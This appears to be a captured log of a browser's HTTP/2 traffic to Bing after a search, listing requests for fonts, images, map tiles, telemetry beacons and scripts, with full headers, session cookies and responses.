x-eventid: 661aafd86e0b4a0c8792a1f83cd446ca
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-3vTAQNKq8Us8FU4N1YKatO/0vBvTusxxyorbrP2yIH8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 04 Dec 2024 10:08:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0fc0b
GET

https://www.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-length: 15436
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 661b7fb4a5a64a25bfe52f31cdb238a2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Dc7XB6hZwYD7vh6hxGugqMXoa2v2PSgRTnvZk3RerSA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 04 Dec 2024 10:08:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0fc19
GET

https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

expires: Tue, 26 Nov 2024 23:45:29 GMT
last-modified: Tue, 24 Sep 2024 06:53:27 GMT
etag: 0x8DCDC6597B401F0
cache-control: public, no-transform, max-age=45933
content-length: 9310
content-type: image/png
content-md5: GUexVzkiHrDbJxwd2PleRg==
x-ms-request-id: 490b4d38-e01e-005f-1926-15186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.1b3f655f.1727913197.118d5375
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Wed, 04 Dec 2024 10:08:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0fcb3
GET

https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=2&shading=hill&logo=n&da=ro&pp=48.324177,4.305159;htp.ms&pp=48.363056,4.332778;htp.ms&pp=48.295212,4.13597;htp.ms&pp=48.324177,4.305159;htp.ms&pp=48.328407,4.115885;htp.ms&pp=48.421005,4.479508;htp.ms&pp=48.331009,4.099303;dfp.ms&pp=48.457363,4.123089;dfp.ms&pp=48.421616,4.480013;dfp.ms

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=2&shading=hill&logo=n&da=ro&pp=48.324177,4.305159;htp.ms&pp=48.363056,4.332778;htp.ms&pp=48.295212,4.13597;htp.ms&pp=48.324177,4.305159;htp.ms&pp=48.328407,4.115885;htp.ms&pp=48.421005,4.479508;htp.ms&pp=48.331009,4.099303;dfp.ms&pp=48.457363,4.123089;dfp.ms&pp=48.421616,4.480013;dfp.ms HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

cache-control: public, max-age=600
content-type: image/jpeg
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
x-bm-traceid: 4370ab9a06b84b4090d900c5def74ac7
x-bm-srv: mapsplatform-frontend-b64849bbd-mgxkj, mapsplatform-imagery-service-645d78b797-gc445
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 102
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4370AB9A06B84B4090D900C5DEF74AC7 Ref B: LON212050703045 Ref C: 2024-12-04T10:08:13Z
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0fe66
GET

https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=432,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=432,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

cache-control: public, max-age=600
content-type: image/jpeg
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
x-bm-traceid: e1ff81545dff4acc923d17141fb82a9c
x-bm-srv: mapsplatform-frontend-b64849bbd-qgj4c, mapsplatform-imagery-service-645d78b797-chj8r
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 155
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E1FF81545DFF4ACC923D17141FB82A9C Ref B: LON212050701035 Ref C: 2024-12-04T10:08:13Z
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306893.7f0ff06
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:508,%22BP%22:711,%22CT%22:731,%22IL%22:26},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:508,%22BP%22:711,%22CT%22:731,%22IL%22:26},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

expires: Sat, 30 Nov 2024 11:19:35 GMT
last-modified: Wed, 20 Nov 2024 06:08:28 GMT
etag: 0x8DD0929C09196E1
cache-control: public, no-transform, max-age=41067
content-length: 7650
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: x2EwVHeB7ANtgfiXW7B0ZQ==
x-ms-request-id: cc00ee3a-201e-006b-5776-3bb7c6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.646e5668.1732138139.51dd4d4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
timing-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f100db
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 373
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-length: 4286
content-type: image/x-icon
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f100da
GET

https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /sa/simg/favicon-trans-bg-blue-mg.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306894.7f100cc
GET

https://www.bing.com/rp/5A_wVM0BDlqDmkBnZeuIpN6wkcA.br.js

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rp/5A_wVM0BDlqDmkBnZeuIpN6wkcA.br.js HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
